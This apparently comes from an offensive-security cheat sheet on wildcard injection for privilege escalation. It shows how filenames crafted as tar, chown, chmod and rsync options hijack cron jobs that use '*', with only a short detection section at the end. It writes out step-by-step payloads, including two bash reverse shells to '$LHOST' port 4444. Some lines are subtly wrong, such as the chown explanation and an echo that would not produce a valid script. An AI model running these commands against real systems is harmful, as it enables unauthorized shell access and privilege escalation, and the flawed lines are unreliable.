Wildcard Injection

Abuse wildcard expansion in cron jobs and scripts for privilege escalation.


How it works

When a script uses wildcards (*) with commands like tar, chown, or rsync — Filenames are interpreted as flags

# If a cron job runs:
cd /opt/backup && tar czf /tmp/backup.tar.gz *

# And you create files named like tar flags:
touch "/opt/backup/--checkpoint=1"
touch "/opt/backup/--checkpoint-action=exec=sh shell.sh"

# tar interprets the filenames as arguments = RCE as the cron user

Tar wildcard injection (most common)

Exploit tar with checkpoint options — Execute arbitrary commands

# 1. Create your reverse shell script:
echo '#!/bin/bash' > /opt/backup/shell.sh
echo 'bash -i >& /dev/tcp/$LHOST/4444 0>&1' >> /opt/backup/shell.sh
chmod +x /opt/backup/shell.sh

# 2. Create the malicious filenames:
touch "/opt/backup/--checkpoint=1"
touch "/opt/backup/--checkpoint-action=exec=sh shell.sh"

# 3. Wait for cron to run tar * → triggers your shell

Chown wildcard injection

Exploit chown with --reference flag — Change file ownership

# If cron runs: chown user:group *

# Create a file owned by root that you want to own:
touch -- "--reference=/etc/passwd"
# chown will use /etc/passwd's ownership as reference

Chmod wildcard injection

Exploit chmod with --reference flag — Change file permissions

# If cron runs: chmod 755 *

touch -- "--reference=/etc/shadow"
# chmod will copy /etc/shadow's permissions to all files

Rsync wildcard injection

Exploit rsync with -e flag — Execute arbitrary commands

# If cron runs: rsync -a * /backup/

touch -- "-e sh shell.sh"
echo '#!/bin/bash\nbash -i >& /dev/tcp/$LHOST/4444 0>&1' > shell.sh
chmod +x shell.sh

How to detect

Look for wildcards in cron jobs and scripts

cat /etc/crontab
ls -la /etc/cron.d/
cat /etc/cron.d/*

# Look for lines like:
# * * * * * root cd /dir && tar czf backup.tar.gz *
# * * * * * root chown user:group /dir/*

# Check writable directories that cron operates on:
find / -writable -type d 2>/dev/null